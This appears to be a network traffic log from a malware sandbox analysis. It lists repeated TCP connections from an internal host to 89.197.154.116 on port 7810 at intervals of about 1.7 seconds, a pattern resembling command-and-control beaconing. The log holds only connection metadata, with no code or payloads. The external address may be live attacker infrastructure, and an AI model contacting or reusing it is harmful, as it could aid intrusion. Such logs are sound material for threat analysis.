Oct 7, 2024 22:02:34.691600084 CEST	7810	50087	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:34.695693016 CEST	50087	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:34.695804119 CEST	50087	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:34.700900078 CEST	7810	50087	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:36.284425020 CEST	7810	50087	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:36.284524918 CEST	50087	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:36.284610987 CEST	50087	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:36.289518118 CEST	7810	50087	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:36.389210939 CEST	50088	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:36.394121885 CEST	7810	50088	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:36.399215937 CEST	50088	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:36.399215937 CEST	50088	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:36.404330969 CEST	7810	50088	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:37.987888098 CEST	7810	50088	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:37.991761923 CEST	50088	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:37.995604992 CEST	50088	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:38.000969887 CEST	7810	50088	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:38.112029076 CEST	50089	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:38.117047071 CEST	7810	50089	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:38.119827032 CEST	50089	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:38.119827032 CEST	50089	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:38.124851942 CEST	7810	50089	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:39.922343016 CEST	7810	50089	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:39.922933102 CEST	50089	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:39.922933102 CEST	50089	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:39.923758030 CEST	7810	50089	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:39.923954010 CEST	50089	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:39.927839994 CEST	7810	50089	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:40.031611919 CEST	50090	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:40.036632061 CEST	7810	50090	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:40.036767960 CEST	50090	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:40.036904097 CEST	50090	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:40.041850090 CEST	7810	50090	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:41.609175920 CEST	7810	50090	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:41.609244108 CEST	50090	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:41.612402916 CEST	50090	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:41.617265940 CEST	7810	50090	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:41.717926025 CEST	50091	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:41.722963095 CEST	7810	50091	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:41.723041058 CEST	50091	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:41.723145008 CEST	50091	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:41.727921009 CEST	7810	50091	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:43.394866943 CEST	7810	50091	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:43.394927025 CEST	50091	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:43.395071030 CEST	50091	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:43.400146961 CEST	7810	50091	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:43.499174118 CEST	50092	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:43.504488945 CEST	7810	50092	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:43.504560947 CEST	50092	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:43.504689932 CEST	50092	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:43.509918928 CEST	7810	50092	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:45.110548973 CEST	7810	50092	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:45.110615969 CEST	50092	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:45.110663891 CEST	50092	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:45.115648985 CEST	7810	50092	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:45.217880964 CEST	50093	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:45.222901106 CEST	7810	50093	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:45.223033905 CEST	50093	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:45.223099947 CEST	50093	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:45.227916002 CEST	7810	50093	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:46.838646889 CEST	7810	50093	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:46.838711977 CEST	50093	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:46.838781118 CEST	50093	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:46.843858957 CEST	7810	50093	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:46.953046083 CEST	50094	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:46.958128929 CEST	7810	50094	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:46.958204985 CEST	50094	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:46.958383083 CEST	50094	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:46.963196039 CEST	7810	50094	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:48.667459011 CEST	7810	50094	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:48.670293093 CEST	50094	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:48.670293093 CEST	50094	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:48.675194025 CEST	7810	50094	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:48.782330990 CEST	50095	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:48.787311077 CEST	7810	50095	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:48.787597895 CEST	50095	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:48.788067102 CEST	50095	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:48.793118954 CEST	7810	50095	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:50.381421089 CEST	7810	50095	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:50.382420063 CEST	50095	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:50.382559061 CEST	50095	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:50.387542009 CEST	7810	50095	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:50.502166033 CEST	50096	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:50.507122040 CEST	7810	50096	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:50.509876966 CEST	50096	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:50.509876966 CEST	50096	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:50.514760971 CEST	7810	50096	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:52.126471043 CEST	7810	50096	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:52.127731085 CEST	50096	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:52.127916098 CEST	50096	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:52.132963896 CEST	7810	50096	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:52.233105898 CEST	50097	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:52.238095045 CEST	7810	50097	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:52.239761114 CEST	50097	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:52.239969015 CEST	50097	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:52.245192051 CEST	7810	50097	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:53.845645905 CEST	7810	50097	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:53.847879887 CEST	50097	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:53.847879887 CEST	50097	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:53.852942944 CEST	7810	50097	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:53.955634117 CEST	50098	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:53.960688114 CEST	7810	50098	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:53.963825941 CEST	50098	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:53.963825941 CEST	50098	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:53.969022036 CEST	7810	50098	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:55.531277895 CEST	7810	50098	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:55.531342030 CEST	50098	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:55.531421900 CEST	50098	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:55.536385059 CEST	7810	50098	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:55.639895916 CEST	50099	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:55.644907951 CEST	7810	50099	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:55.644985914 CEST	50099	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:55.645150900 CEST	50099	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:55.650048018 CEST	7810	50099	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:57.239664078 CEST	7810	50099	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:57.239728928 CEST	50099	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:57.239837885 CEST	50099	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:57.244609118 CEST	7810	50099	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:57.343079090 CEST	50100	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:57.348267078 CEST	7810	50100	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:57.348334074 CEST	50100	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:57.348505020 CEST	50100	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:57.353351116 CEST	7810	50100	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:59.271534920 CEST	7810	50100	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:59.271603107 CEST	50100	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:59.271884918 CEST	7810	50100	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:59.271923065 CEST	50100	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:59.288501024 CEST	50100	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:59.293601990 CEST	7810	50100	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:59.405622005 CEST	50101	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:59.410649061 CEST	7810	50101	89.197.154.116	192.168.2.4
Oct 7, 2024 22:02:59.410722017 CEST	50101	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:59.410825014 CEST	50101	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:02:59.416619062 CEST	7810	50101	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:01.004229069 CEST	7810	50101	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:01.004317045 CEST	50101	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:01.004384995 CEST	50101	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:01.009746075 CEST	7810	50101	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:01.108633995 CEST	50102	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:01.490325928 CEST	7810	50102	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:01.490421057 CEST	50102	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:01.490750074 CEST	50102	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:01.497903109 CEST	7810	50102	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:03.244594097 CEST	7810	50102	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:03.244781017 CEST	50102	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:03.244781017 CEST	50102	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:03.249739885 CEST	7810	50102	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:03.358885050 CEST	50103	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:03.363787889 CEST	7810	50103	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:03.363858938 CEST	50103	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:03.364001989 CEST	50103	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:03.368828058 CEST	7810	50103	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:04.959964037 CEST	7810	50103	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:04.960031986 CEST	50103	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:04.960130930 CEST	50103	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:04.965265989 CEST	7810	50103	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:05.077719927 CEST	50104	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:05.082978964 CEST	7810	50104	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:05.083055973 CEST	50104	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:05.083220959 CEST	50104	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:05.088546991 CEST	7810	50104	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:06.689521074 CEST	7810	50104	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:06.689840078 CEST	50104	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:06.690063953 CEST	50104	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:06.694950104 CEST	7810	50104	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:06.795506001 CEST	50105	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:06.801217079 CEST	7810	50105	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:06.803802013 CEST	50105	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:06.803975105 CEST	50105	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:06.809228897 CEST	7810	50105	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:08.397255898 CEST	7810	50105	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:08.399775982 CEST	50105	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:08.399775982 CEST	50105	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:08.406198025 CEST	7810	50105	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:08.514549017 CEST	50106	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:09.477406979 CEST	7810	50106	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:09.477497101 CEST	50106	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:09.477650881 CEST	50106	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:09.482433081 CEST	7810	50106	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:11.048414946 CEST	7810	50106	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:11.048492908 CEST	50106	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:11.048568010 CEST	50106	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:11.053492069 CEST	7810	50106	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:11.156213999 CEST	50107	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:11.161242008 CEST	7810	50107	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:11.161407948 CEST	50107	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:11.161505938 CEST	50107	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:11.166399956 CEST	7810	50107	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:12.778352022 CEST	7810	50107	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:12.779771090 CEST	50107	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:12.779865026 CEST	50107	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:12.784818888 CEST	7810	50107	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:12.890309095 CEST	50108	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:12.895399094 CEST	7810	50108	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:12.895490885 CEST	50108	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:12.895720005 CEST	50108	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:12.900726080 CEST	7810	50108	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:14.470870018 CEST	7810	50108	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:14.471823931 CEST	50108	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:14.471824884 CEST	50108	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:14.476838112 CEST	7810	50108	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:14.579658985 CEST	50109	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:14.584652901 CEST	7810	50109	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:14.584759951 CEST	50109	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:14.584964991 CEST	50109	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:14.589741945 CEST	7810	50109	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:16.195120096 CEST	7810	50109	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:16.195755005 CEST	50109	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:16.195755005 CEST	50109	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:16.200761080 CEST	7810	50109	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:16.311759949 CEST	50110	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:16.316884041 CEST	7810	50110	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:16.319509029 CEST	50110	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:16.319725990 CEST	50110	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:16.324517012 CEST	7810	50110	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:20.324956894 CEST	50110	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:20.436574936 CEST	50111	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:20.441792011 CEST	7810	50111	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:20.441925049 CEST	50111	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:20.442635059 CEST	50111	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:20.447588921 CEST	7810	50111	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:22.035526991 CEST	7810	50111	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:22.036588907 CEST	50111	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:22.037985086 CEST	50111	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:22.042774916 CEST	7810	50111	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:22.142810106 CEST	50112	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:22.148143053 CEST	7810	50112	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:22.150666952 CEST	50112	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:22.157046080 CEST	50112	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:22.161892891 CEST	7810	50112	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:23.736021996 CEST	7810	50112	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:23.736121893 CEST	50112	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:23.736228943 CEST	50112	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:23.741394043 CEST	7810	50112	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:23.842483997 CEST	50113	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:23.849395037 CEST	7810	50113	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:23.849458933 CEST	50113	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:23.849575996 CEST	50113	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:23.855930090 CEST	7810	50113	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:25.438770056 CEST	7810	50113	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:25.438851118 CEST	50113	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:25.438967943 CEST	50113	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:25.444557905 CEST	7810	50113	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:25.545672894 CEST	50114	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:25.551268101 CEST	7810	50114	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:25.551373959 CEST	50114	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:25.551630020 CEST	50114	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:25.557008028 CEST	7810	50114	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:27.125340939 CEST	7810	50114	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:27.125402927 CEST	50114	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:27.125454903 CEST	50114	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:27.130590916 CEST	7810	50114	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:27.236203909 CEST	50115	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:27.241509914 CEST	7810	50115	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:27.241589069 CEST	50115	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:27.241765976 CEST	50115	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:27.246597052 CEST	7810	50115	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:31.246893883 CEST	50115	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:31.359719038 CEST	50116	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:31.364828110 CEST	7810	50116	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:31.364897966 CEST	50116	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:31.365053892 CEST	50116	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:31.369899035 CEST	7810	50116	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:32.940270901 CEST	7810	50116	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:32.940346956 CEST	50116	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:32.940416098 CEST	50116	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:32.945436001 CEST	7810	50116	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:33.046451092 CEST	50117	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:33.051609993 CEST	7810	50117	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:33.051675081 CEST	50117	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:33.051806927 CEST	50117	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:33.056655884 CEST	7810	50117	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:34.924628019 CEST	7810	50117	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:34.924691916 CEST	50117	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:34.924787998 CEST	50117	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:34.925229073 CEST	7810	50117	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:34.925268888 CEST	50117	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:34.929707050 CEST	7810	50117	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:35.030698061 CEST	50118	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:35.036053896 CEST	7810	50118	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:35.036113977 CEST	50118	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:35.036241055 CEST	50118	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:35.041461945 CEST	7810	50118	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:36.645173073 CEST	7810	50118	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:36.647798061 CEST	50118	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:36.647990942 CEST	50118	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:36.653239012 CEST	7810	50118	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:36.767709017 CEST	50119	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:36.772954941 CEST	7810	50119	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:36.775821924 CEST	50119	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:36.776012897 CEST	50119	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:36.781240940 CEST	7810	50119	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:38.366823912 CEST	7810	50119	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:38.367772102 CEST	50119	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:38.367903948 CEST	50119	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:38.372755051 CEST	7810	50119	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:38.483432055 CEST	50120	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:38.488564014 CEST	7810	50120	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:38.489633083 CEST	50120	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:38.489892960 CEST	50120	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:38.495486975 CEST	7810	50120	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:40.067204952 CEST	7810	50120	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:40.067333937 CEST	50120	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:40.067442894 CEST	50120	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:40.072472095 CEST	7810	50120	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:40.170636892 CEST	50121	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:40.175831079 CEST	7810	50121	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:40.176038027 CEST	50121	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:40.176038027 CEST	50121	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:40.181782961 CEST	7810	50121	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:41.793143988 CEST	7810	50121	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:41.793350935 CEST	50121	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:41.793350935 CEST	50121	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:41.798387051 CEST	7810	50121	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:41.905137062 CEST	50122	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:41.910243988 CEST	7810	50122	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:41.910474062 CEST	50122	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:41.914148092 CEST	50122	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:41.919074059 CEST	7810	50122	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:43.493761063 CEST	7810	50122	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:43.493833065 CEST	50122	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:43.493891954 CEST	50122	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:43.499005079 CEST	7810	50122	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:43.608752966 CEST	50123	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:43.613935947 CEST	7810	50123	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:43.614029884 CEST	50123	7810	192.168.2.4	89.197.154.116
